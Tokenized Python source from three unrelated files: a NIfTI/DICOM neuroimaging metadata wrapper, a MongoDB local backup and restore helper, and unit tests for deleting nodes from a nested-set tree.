'<STR_LIT>' ) ) <EOL> local_vals = self . get_values ( key ) <EOL> other_vals = other . _get_changed_class ( key , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> self . slice_dim ) <EOL> shape = self . shape <EOL> n_dims = len ( shape ) <EOL> if sample_base == '<STR_LIT:time>' and n_dims == <NUM_LIT:5> : <EOL> n_slices = self . n_slices <EOL> slices_per_vec = n_slices * shape [ <NUM_LIT:3> ] <EOL> oth_slc_per_vec = n_slices * other . shape [ <NUM_LIT:3> ] <EOL> intlv = [ ] <EOL> loc_start = <NUM_LIT:0> <EOL> oth_start = <NUM_LIT:0> <EOL> for vec_idx in xrange ( shape [ <NUM_LIT:4> ] ) : <EOL> intlv += local_vals [ loc_start : loc_start + slices_per_vec ] <EOL> intlv += other_vals [ oth_start : oth_start + oth_slc_per_vec ] <EOL> loc_start += slices_per_vec <EOL> oth_start += oth_slc_per_vec <EOL> self . get_class_dict ( ( '<STR_LIT>' , '<STR_LIT>' ) ) [ key ] = intlv <EOL> else : <EOL> local_vals . extend ( other_vals ) <EOL> nb . nifti1 . extension_codes . add_codes ( ( ( dcm_meta_ecode , <EOL> "<STR_LIT>" , <EOL> DcmMetaExtension ) , ) <EOL> ) <EOL> class MissingExtensionError ( Exception ) : <EOL> '''<STR_LIT>''' <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' <EOL> def patch_dcm_ds_is ( dcm ) : <EOL> '''<STR_LIT>''' <EOL> for elem in dcm : <EOL> if elem . VM == <NUM_LIT:1> : <EOL> if elem . VR in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> if elem . value == '<STR_LIT>' : <EOL> continue <EOL> if elem . VR == '<STR_LIT>' : <EOL> elem . VR = '<STR_LIT>' <EOL> elem . value = float ( elem . value ) <EOL> else : <EOL> elem . VR = '<STR_LIT>' <EOL> elem . value = int ( elem . value ) <EOL> else : <EOL> if elem . VR in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> if elem . value == '<STR_LIT>' : <EOL> continue <EOL> if elem . VR == '<STR_LIT>' : <EOL> elem . VR = '<STR_LIT>' <EOL> elem . value = [ float ( val ) for val in elem . value ] <EOL> else : <EOL> elem . VR = '<STR_LIT>' <EOL> elem . value = [ int ( val ) for val in elem . value ] <EOL> class NiftiWrapper ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , nii_img , make_empty = False ) : <EOL> self . nii_img = nii_img <EOL> hdr = nii_img . get_header ( ) <EOL> self . meta_ext = None <EOL> for extension in hdr . extensions : <EOL> if extension . get_code ( ) == dcm_meta_ecode : <EOL> try : <EOL> extension . check_valid ( ) <EOL> except InvalidExtensionError , e : <EOL> print "<STR_LIT>" % e <EOL> else : <EOL> if not self . meta_ext is None : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . meta_ext = extension <EOL> if not self . meta_ext : <EOL> if make_empty : <EOL> slice_dim = hdr . get_dim_info ( ) [ <NUM_LIT:2> ] <EOL> self . meta_ext = DcmMetaExtension . make_empty ( self . nii_img . shape , <EOL> hdr . get_best_affine ( ) , <EOL> None , <EOL> slice_dim ) <EOL> hdr . extensions . append ( self . meta_ext ) <EOL> else : <EOL> raise MissingExtensionError <EOL> self . meta_ext . check_valid ( ) <EOL> def __getitem__ ( self , key ) : <EOL> '''<STR_LIT>''' <EOL> return self . meta_ext . get_class_dict ( ( '<STR_LIT>' , '<STR_LIT>' ) ) [ key ] <EOL> def meta_valid ( self , classification ) : <EOL> '''<STR_LIT>''' <EOL> if classification == ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return True <EOL> img_shape = self . nii_img . get_shape ( ) <EOL> meta_shape = self . meta_ext . shape <EOL> if classification == ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return meta_shape [ <NUM_LIT:4> : ] == img_shape [ <NUM_LIT:4> : ] <EOL> if classification == ( '<STR_LIT:time>' , '<STR_LIT>' ) : <EOL> return meta_shape [ <NUM_LIT:3> : ] == img_shape [ <NUM_LIT:3> : ] <EOL> hdr = self . nii_img . get_header ( ) <EOL> if self . meta_ext . n_slices != hdr . get_n_slices ( ) : <EOL> return False <EOL> slice_dim = hdr . get_dim_info ( ) [ <NUM_LIT:2> ] <EOL> slice_dir = self . nii_img . get_affine ( ) [ slice_dim , : <NUM_LIT:3> ] <EOL> slices_aligned = np . allclose ( slice_dir , <EOL> self . meta_ext . slice_normal , <EOL> atol = <NUM_LIT> ) <EOL> if classification == ( '<STR_LIT:time>' , '<STR_LIT>' ) : <EOL> return slices_aligned <EOL> if classification == ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return meta_shape [ <NUM_LIT:3> ] == img_shape [ <NUM_LIT:3> ] and slices_aligned <EOL> if classification == ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return meta_shape [ <NUM_LIT:3> : ] == img_shape [ <NUM_LIT:3> : ] and slices_aligned <EOL> def get_meta ( self , key , index = None , default = None ) : <EOL> '''<STR_LIT>''' <EOL> values , classes = self . meta_ext . get_values_and_class ( key ) <EOL> if classes is None : <EOL> return default <EOL> if classes == ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return values <EOL> if not self . meta_valid ( classes ) : <EOL> return default <EOL> if not index is None : <EOL> shape = self . nii_img . get_shape ( ) <EOL> if len ( index ) != len ( shape ) : <EOL> raise IndexError ( '<STR_LIT>' ) <EOL> for dim , ind_val in enumerate ( index ) : <EOL> if not <NUM_LIT:0> <= ind_val < shape [ dim ] : <EOL> raise IndexError ( '<STR_LIT>' ) <EOL> if classes == ( '<STR_LIT:time>' , '<STR_LIT>' ) : <EOL> return values [ index [ <NUM_LIT:3> ] ] <EOL> if classes == ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return values [ index [ <NUM_LIT:4> ] ] <EOL> slice_dim = self . nii_img . get_header ( ) . get_dim_info ( ) [ <NUM_LIT:2> ] <EOL> n_slices = shape [ slice_dim ] <EOL> if classes == ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> val_idx = index [ slice_dim ] <EOL> for count , idx_val in enumerate ( index [ <NUM_LIT:3> : ] ) : <EOL> val_idx += idx_val * n_slices <EOL> n_slices *= shape [ count + <NUM_LIT:3> ] <EOL> return values [ val_idx ] <EOL> elif classes == ( '<STR_LIT:time>' , '<STR_LIT>' ) : <EOL> val_idx = index [ slice_dim ] <EOL> return values [ val_idx ] <EOL> elif classes == ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> val_idx = index [ slice_dim ] <EOL> val_idx += index [ <NUM_LIT:3> ] * n_slices <EOL> return values [ val_idx ] <EOL> return default <EOL> def remove_extension ( self ) : <EOL> '''<STR_LIT>''' <EOL> hdr = self . nii_img . get_header ( ) <EOL> target_idx = None <EOL> for idx , ext in enumerate ( hdr . extensions ) : <EOL> if id ( ext ) == id ( self . meta_ext ) : <EOL> target_idx = idx <EOL> break <EOL> else : <EOL> raise IndexError ( '<STR_LIT>' ) <EOL> del hdr . extensions [ target_idx ] <EOL> hdr [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> def replace_extension ( self , dcmmeta_ext ) : <EOL> '''<STR_LIT>''' <EOL> self . remove_extension ( ) <EOL> self . nii_img . get_header ( ) . extensions . append ( dcmmeta_ext ) <EOL> self . meta_ext = dcmmeta_ext <EOL> def split ( self , dim = None ) : <EOL> '''<STR_LIT>''' <EOL> shape = self . nii_img . get_shape ( ) <EOL> data = self . nii_img . get_data ( ) <EOL> header = self . nii_img . get_header ( ) <EOL> slice_dim = header . get_dim_info ( ) [ <NUM_LIT:2> ] <EOL> if dim is None : <EOL> dim = len ( shape ) - <NUM_LIT:1> <EOL> if dim == <NUM_LIT:2> : <EOL> if slice_dim is None : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> dim = slice_dim <EOL> trans_update = None <EOL> if dim < <NUM_LIT:3> : <EOL> trans_update = header . get_best_affine ( ) [ : <NUM_LIT:3> , dim ] <EOL> split_hdr = header . copy ( ) <EOL> slices = [ slice ( None ) ] * len ( shape ) <EOL> for idx in xrange ( shape [ dim ] ) : <EOL> if dim >= <NUM_LIT:3> and dim == len ( shape ) - <NUM_LIT:1> : <EOL> slices [ dim ] = idx <EOL> else : <EOL> slices [ dim ] = slice ( idx , idx + <NUM_LIT:1> ) <EOL> split_data = data [ slices ] . copy ( ) <EOL> if not trans_update is None and idx != <NUM_LIT:0> : <EOL> qform = split_hdr . get_qform ( ) <EOL> if not qform is None : <EOL> qform [ : <NUM_LIT:3> , <NUM_LIT:3> ] += trans_update <EOL> split_hdr . set_qform ( qform ) <EOL> sform = split_hdr . get_sform ( ) <EOL> if not sform is None : <EOL> sform [ : <NUM_LIT:3> , <NUM_LIT:3> ] += trans_update <EOL> split_hdr . set_sform ( sform ) <EOL> split_nii = nb . Nifti1Image ( split_data , <EOL> split_hdr . get_best_affine ( ) , <EOL> header = split_hdr ) <EOL> meta_dim = dim <EOL> if dim == slice_dim : <EOL> meta_dim = self . meta_ext . slice_dim <EOL> split_meta = self . meta_ext . get_subset ( meta_dim , idx ) <EOL> result = NiftiWrapper ( split_nii ) <EOL> result . replace_extension ( split_meta ) <EOL> yield result <EOL> def to_filename ( self , out_path ) : <EOL> '''<STR_LIT>''' <EOL> self . meta_ext . check_valid ( ) <EOL> self . nii_img . to_filename ( out_path ) <EOL> @ classmethod <EOL> def from_filename ( klass , path ) : <EOL> '''<STR_LIT>''' <EOL> return klass ( nb . load ( path ) ) <EOL> @ classmethod <EOL> def from_dicom_wrapper ( klass , dcm_wrp , meta_dict = None ) : <EOL> '''<STR_LIT>''' <EOL> data = dcm_wrp . get_data ( ) <EOL> affine = np . dot ( np . diag ( [ - <NUM_LIT:1.> , - <NUM_LIT:1.> , <NUM_LIT:1.> , <NUM_LIT:1.> ] ) , dcm_wrp . get_affine ( ) ) <EOL> if len ( data . shape ) == <NUM_LIT:2> : <EOL> data = data . reshape ( data . shape + ( <NUM_LIT:1> , ) ) <EOL> nii_img = nb . nifti1 . Nifti1Image ( data , affine ) <EOL> hdr = nii_img . get_header ( ) <EOL> hdr . set_xyzt_units ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> dim_info = { '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : <NUM_LIT:2> <EOL> } <EOL> if hasattr ( dcm_wrp . dcm_data , '<STR_LIT>' ) : <EOL> if dcm_wrp [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> dim_info [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> dim_info [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> else : <EOL> dim_info [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> dim_info [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> hdr . set_dim_info ( ** dim_info ) <EOL> result = klass ( nii_img , make_empty = True ) <EOL> result . meta_ext . reorient_transform = np . eye ( <NUM_LIT:4> ) <EOL> if meta_dict : <EOL> result . meta_ext . get_class_dict ( ( '<STR_LIT>' , '<STR_LIT>' ) ) . update ( meta_dict ) <EOL> return result <EOL> @ classmethod <EOL> def from_dicom ( klass , dcm_data , meta_dict = None ) : <EOL> '''<STR_LIT>''' <EOL> dcm_wrp = wrapper_from_data ( dcm_data ) <EOL> return klass . from_dicom_wrapper ( dcm_wrp , meta_dict ) <EOL> @ classmethod <EOL> def from_sequence ( klass , seq , dim = None ) : <EOL> '''<STR_LIT>''' <EOL> n_inputs = len ( seq ) <EOL> first_input = seq [ <NUM_LIT:0> ] <EOL> first_nii = first_input . nii_img <EOL> first_hdr = first_nii . get_header ( ) <EOL> shape = first_nii . shape <EOL> affine = first_nii . get_affine ( ) . copy ( ) <EOL> if dim is None : <EOL> if len ( shape ) == <NUM_LIT:3> : <EOL> singular_dim = None <EOL> for dim_idx , dim_size in enumerate ( shape ) : <EOL> if dim_size == <NUM_LIT:1> : <EOL> singular_dim = dim_idx <EOL> if singular_dim is None : <EOL> dim = <NUM_LIT:3> <EOL> else : <EOL> dim = singular_dim <EOL> if len ( shape ) == <NUM_LIT:4> : <EOL> dim = <NUM_LIT:4> <EOL> else : <EOL> if not <NUM_LIT:0> <= dim < <NUM_LIT:5> : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if dim < len ( shape ) and shape [ dim ] != <NUM_LIT:1> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> axes = [ ] <EOL> for axis_idx in xrange ( <NUM_LIT:3> ) : <EOL> axis_vec = affine [ : <NUM_LIT:3> , axis_idx ] <EOL> if axis_idx == dim : <EOL> axis_vec = axis_vec . copy ( ) <EOL> axis_vec /= np . sqrt ( np . dot ( axis_vec , axis_vec ) ) <EOL> axes . append ( axis_vec ) <EOL> trans = affine [ : <NUM_LIT:3> , <NUM_LIT:3> ] <EOL> result_shape = list ( shape ) <EOL> while dim >= len ( result_shape ) : <EOL> result_shape . append ( <NUM_LIT:1> ) <EOL> result_shape [ dim ] = n_inputs <EOL> result_dtype = max ( input_wrp . nii_img . get_data ( ) . dtype <EOL> for input_wrp in seq ) <EOL> result_data = np . empty ( result_shape , dtype = result_dtype ) <EOL> hdr_info = { '<STR_LIT>' : first_hdr . get_qform ( ) , <EOL> '<STR_LIT>' : first_hdr [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : first_hdr . get_sform ( ) , <EOL> '<STR_LIT>' : first_hdr [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : list ( first_hdr . get_dim_info ( ) ) , <EOL> '<STR_LIT>' : list ( first_hdr . get_xyzt_units ( ) ) , <EOL> } <EOL> try : <EOL> hdr_info [ '<STR_LIT>' ] = first_hdr . get_slice_duration ( ) <EOL> except HeaderDataError : <EOL> hdr_info [ '<STR_LIT>' ] = None <EOL> try : <EOL> hdr_info [ '<STR_LIT>' ] = first_hdr . get_intent ( ) <EOL> except HeaderDataError : <EOL> hdr_info [ '<STR_LIT>' ] = None <EOL> try : <EOL> hdr_info [ '<STR_LIT>' ] = first_hdr . get_slice_times ( ) <EOL> except HeaderDataError : <EOL> hdr_info [ '<STR_LIT>' ] = None <EOL> data_slices = [ slice ( None ) ] * len ( result_shape ) <EOL> for dim_idx , dim_size in enumerate ( result_shape ) : <EOL> if dim_size == <NUM_LIT:1> : <EOL> data_slices [ dim_idx ] = <NUM_LIT:0> <EOL> last_trans = None <EOL> for input_idx in range ( n_inputs ) : <EOL> input_wrp = seq [ input_idx ] <EOL> input_nii = input_wrp . nii_img <EOL> input_aff = input_nii . get_affine ( ) <EOL> input_hdr = input_nii . get_header ( ) <EOL> for axis_idx , axis_vec in enumerate ( axes ) : <EOL> in_vec = input_aff [ : <NUM_LIT:3> , axis_idx ] <EOL> if axis_idx == dim : <EOL> in_vec = in_vec . copy ( ) <EOL> in_vec /= np . sqrt ( np . dot ( in_vec , in_vec ) ) <EOL> in_trans = input_aff [ : <NUM_LIT:3> , <NUM_LIT:3> ] <EOL> if not last_trans is None : <EOL> trans_diff = in_trans - last_trans <EOL> if not np . allclose ( trans_diff , <NUM_LIT:0.0> ) : <EOL> trans_diff /= np . sqrt ( np . dot ( trans_diff , trans_diff ) ) <EOL> if ( np . allclose ( trans_diff , <NUM_LIT:0.0> ) or <EOL> not np . allclose ( np . dot ( trans_diff , in_vec ) , <EOL> <NUM_LIT:1.0> , <EOL> atol = <NUM_LIT> ) <EOL> ) : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> last_trans = in_trans <EOL> if not np . allclose ( in_vec , axis_vec , atol = <NUM_LIT> ) : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> data_slices [ dim ] = input_idx <EOL> result_data [ data_slices ] = input_nii . get_data ( ) . squeeze ( ) <EOL> if input_idx != <NUM_LIT:0> : <EOL> if ( hdr_info [ '<STR_LIT>' ] is None or <EOL> input_hdr . get_qform ( ) is None or <EOL> not np . allclose ( input_hdr . get_qform ( ) , hdr_info [ '<STR_LIT>' ] ) <EOL> ) : <EOL> hdr_info [ '<STR_LIT>' ] = None <EOL> if input_hdr [ '<STR_LIT>' ] != hdr_info [ '<STR_LIT>' ] : <EOL> hdr_info [ '<STR_LIT>' ] = None <EOL> if ( hdr_info [ '<STR_LIT>' ] is None or <EOL> input_hdr . get_sform ( ) is None or <EOL> not np . allclose ( input_hdr . get_sform ( ) , hdr_info [ '<STR_LIT>' ] ) <EOL> ) : <EOL> hdr_info [ '<STR_LIT>' ] = None <EOL> if input_hdr [ '<STR_LIT>' ] != hdr_info [ '<STR_LIT>' ] : <EOL> hdr_info [ '<STR_LIT>' ] = None <EOL> in_dim_info = list ( input_hdr . get_dim_info ( ) ) <EOL> if in_dim_info != hdr_info [ '<STR_LIT>' ] : <EOL> for idx in xrange ( <NUM_LIT:3> ) : <EOL> if in_dim_info [ idx ] != hdr_info [ '<STR_LIT>' ] [ idx ] : <EOL> hdr_info [ '<STR_LIT>' ] [ idx ] = None <EOL> in_xyzt_units = list ( input_hdr . get_xyzt_units ( ) ) <EOL> if in_xyzt_units != hdr_info [ '<STR_LIT>' ] : <EOL> for idx in xrange ( <NUM_LIT:2> ) : <EOL> if in_xyzt_units [ idx ] != hdr_info [ '<STR_LIT>' ] [ idx ] : <EOL> hdr_info [ '<STR_LIT>' ] [ idx ] = None <EOL> try : <EOL> if input_hdr . get_slice_duration ( ) != hdr_info [ '<STR_LIT>' ] : <EOL> hdr_info [ '<STR_LIT>' ] = None <EOL> except HeaderDataError : <EOL> hdr_info [ '<STR_LIT>' ] = None <EOL> try : <EOL> if input_hdr . get_intent ( ) != hdr_info [ '<STR_LIT>' ] : <EOL> hdr_info [ '<STR_LIT>' ] = None <EOL> except HeaderDataError : <EOL> hdr_info [ '<STR_LIT>' ] = None <EOL> try : <EOL> if input_hdr . get_slice_times ( ) != hdr_info [ '<STR_LIT>' ] : <EOL> hdr_info [ '<STR_LIT>' ] = None <EOL> except HeaderDataError : <EOL> hdr_info [ '<STR_LIT>' ] = None <EOL> scaled_dim_dir = None <EOL> if dim < <NUM_LIT:3> : <EOL> scaled_dim_dir = seq [ <NUM_LIT:1> ] . nii_img . get_affine ( ) [ : <NUM_LIT:3> , <NUM_LIT:3> ] - trans <EOL> affine [ : <NUM_LIT:3> , dim ] = scaled_dim_dir <EOL> result_nii = nb . Nifti1Image ( result_data , affine ) <EOL> result_hdr = result_nii . get_header ( ) <EOL> if hdr_info [ '<STR_LIT>' ] is not None and hdr_info [ '<STR_LIT>' ] is not None : <EOL> if not scaled_dim_dir is None : <EOL> hdr_info [ '<STR_LIT>' ] [ : <NUM_LIT:3> , dim ] = scaled_dim_dir <EOL> result_nii . set_qform ( hdr_info [ '<STR_LIT>' ] , <EOL> int ( hdr_info [ '<STR_LIT>' ] ) , <EOL> update_affine = True ) <EOL> if hdr_info [ '<STR_LIT>' ] is not None and hdr_info [ '<STR_LIT>' ] is not None : <EOL> if not scaled_dim_dir is None : <EOL> hdr_info [ '<STR_LIT>' ] [ : <NUM_LIT:3> , dim ] = scaled_dim_dir <EOL> result_nii . set_sform ( hdr_info [ '<STR_LIT>' ] , <EOL> int ( hdr_info [ '<STR_LIT>' ] ) , <EOL> update_affine = True ) <EOL> if hdr_info [ '<STR_LIT>' ] is not None : <EOL> result_hdr . set_dim_info ( * hdr_info [ '<STR_LIT>' ] ) <EOL> slice_dim = hdr_info [ '<STR_LIT>' ] [ <NUM_LIT:2> ] <EOL> else : <EOL> slice_dim = None <EOL> if hdr_info [ '<STR_LIT>' ] is not None : <EOL> result_hdr . set_intent ( * hdr_info [ '<STR_LIT>' ] ) <EOL> if hdr_info [ '<STR_LIT>' ] is not None : <EOL> result_hdr . set_xyzt_units ( * hdr_info [ '<STR_LIT>' ] ) <EOL> if hdr_info [ '<STR_LIT>' ] is not None : <EOL> result_hdr . set_slice_duration ( hdr_info [ '<STR_LIT>' ] ) <EOL> if hdr_info [ '<STR_LIT>' ] is not None : <EOL> result_hdr . set_slice_times ( hdr_info [ '<STR_LIT>' ] ) <EOL> seq_exts = [ elem . meta_ext for elem in seq ] <EOL> result_ext = DcmMetaExtension . from_sequence ( seq_exts , <EOL> dim , <EOL> affine , <EOL> slice_dim ) <EOL> result_hdr . extensions . append ( result_ext ) <EOL> return NiftiWrapper ( result_nii ) </s>
<s> import os <EOL> import shutil <EOL> import zipfile <EOL> from datetime import datetime <EOL> from . mongo import restore , dump_db <EOL> from . utils import temp_directory , exit_with_message , zipdir <EOL> def local_restore ( zip_path , to_environment ) : <EOL> zip = zipfile . ZipFile ( zip_path ) <EOL> with temp_directory ( ) as temp_dir : <EOL> zip . extractall ( path = temp_dir ) <EOL> restore ( temp_dir , to_environment ) <EOL> def local_backups ( local_config ) : <EOL> if '<STR_LIT>' not in local_config : <EOL> exit_with_message ( '<STR_LIT>' ) <EOL> backup_dir = local_config [ '<STR_LIT>' ] <EOL> if not os . path . isdir ( backup_dir ) : <EOL> exit_with_message ( '<STR_LIT>' . format ( backup_dir ) ) <EOL> backups = { } <EOL> for item in os . listdir ( backup_dir ) : <EOL> backups [ item ] = os . path . join ( backup_dir , item ) <EOL> return backups <EOL> def backup_localy ( environment , local_settings , name , query_set_class = None ) : <EOL> if '<STR_LIT>' not in local_settings : <EOL> exit_with_message ( '<STR_LIT>' ) <EOL> backup_dir = local_settings [ '<STR_LIT>' ] <EOL> if not os . path . isdir ( backup_dir ) : <EOL> exit_with_message ( '<STR_LIT>' . format ( backup_dir ) ) <EOL> dump_path = dump_db ( environment , QuerySet = query_set_class ) <EOL> zipf = zipdir ( dump_path ) <EOL> unique_file_path = generate_unique_name ( backup_dir , environment , name ) <EOL> shutil . move ( zipf . filename , unique_file_path ) <EOL> def generate_unique_name ( backup_dir , environemnt , name_prefix ) : <EOL> if name_prefix and name_prefix != '<STR_LIT>' : <EOL> name_base = name_prefix <EOL> else : <EOL> name_base = environemnt [ '<STR_LIT>' ] <EOL> name_attempt = "<STR_LIT>" . format ( name_base , datetime . utcnow ( ) . strftime ( "<STR_LIT>" ) ) <EOL> name_attempt_full_path = os . path . join ( backup_dir , name_attempt ) <EOL> if not os . path . exists ( name_attempt_full_path ) : <EOL> return name_attempt_full_path <EOL> else : <EOL> counter = <NUM_LIT:1> <EOL> while True : <EOL> counter += <NUM_LIT:1> <EOL> name_attempt = "<STR_LIT>" . format ( name_base , <EOL> datetime . utcnow ( ) . strftime ( "<STR_LIT>" ) , counter ) <EOL> name_attempt_full_path = os . path . join ( backup_dir , name_attempt ) <EOL> if os . path . exists ( name_attempt_full_path ) : <EOL> continue <EOL> else : <EOL> return name_attempt_full_path </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import , division , print_function , with_statement , unicode_literals <EOL> from . helper import unittest , db , Named , get_tree_details <EOL> from . Named import NamedTestCase <EOL> class DeletionTestCase ( NamedTestCase ) : <EOL> def _delete_helper ( self , name , result ) : <EOL> node = db . session . query ( Named ) . filter_by ( name = name ) . one ( ) <EOL> db . session . delete ( node ) <EOL> db . session . commit ( ) <EOL> self . assertEqual ( get_tree_details ( ) , result ) <EOL> def test_del_root1 ( self ) : <EOL> name = u"<STR_LIT>" <EOL> result = [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:0> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:0> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:3> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:0> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:20> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT:15> , '<STR_LIT>' : <NUM_LIT:1> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:left>' : <NUM_LIT:3> , '<STR_LIT:right>' : <NUM_LIT:4> , '<STR_LIT>' : <NUM_LIT:2> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:left>' : <NUM_LIT:5> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:2> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:left>' : <NUM_LIT:6> , '<STR_LIT:right>' : <NUM_LIT:7> , '<STR_LIT>' : <NUM_LIT:3> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:left>' : <NUM_LIT:8> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:3> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:left>' : <NUM_LIT:9> , '<STR_LIT:right>' : <NUM_LIT:10> , '<STR_LIT>' : <NUM_LIT:4> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:left>' : <NUM_LIT:11> , '<STR_LIT:right>' : <NUM_LIT:12> , '<STR_LIT>' : <NUM_LIT:4> } , [ ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:left>' : <NUM_LIT:16> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:left>' : <NUM_LIT> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:5> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:0> } , [ ] ) , <EOL> ] <EOL> self . _delete_helper ( name , result ) <EOL> def test_del_child11 ( self ) : <EOL> name = u"<STR_LIT>" <EOL> result = [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:6> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT:3> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:4> , '<STR_LIT:right>' : <NUM_LIT:5> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:20> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT:15> , '<STR_LIT>' : <NUM_LIT:1> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:3> , '<STR_LIT:right>' : <NUM_LIT:4> , '<STR_LIT>' : <NUM_LIT:2> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:5> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:2> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:6> , '<STR_LIT:right>' : <NUM_LIT:7> , '<STR_LIT>' : <NUM_LIT:3> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:8> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:3> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:9> , '<STR_LIT:right>' : <NUM_LIT:10> , '<STR_LIT>' : <NUM_LIT:4> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:11> , '<STR_LIT:right>' : <NUM_LIT:12> , '<STR_LIT>' : <NUM_LIT:4> } , [ ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : 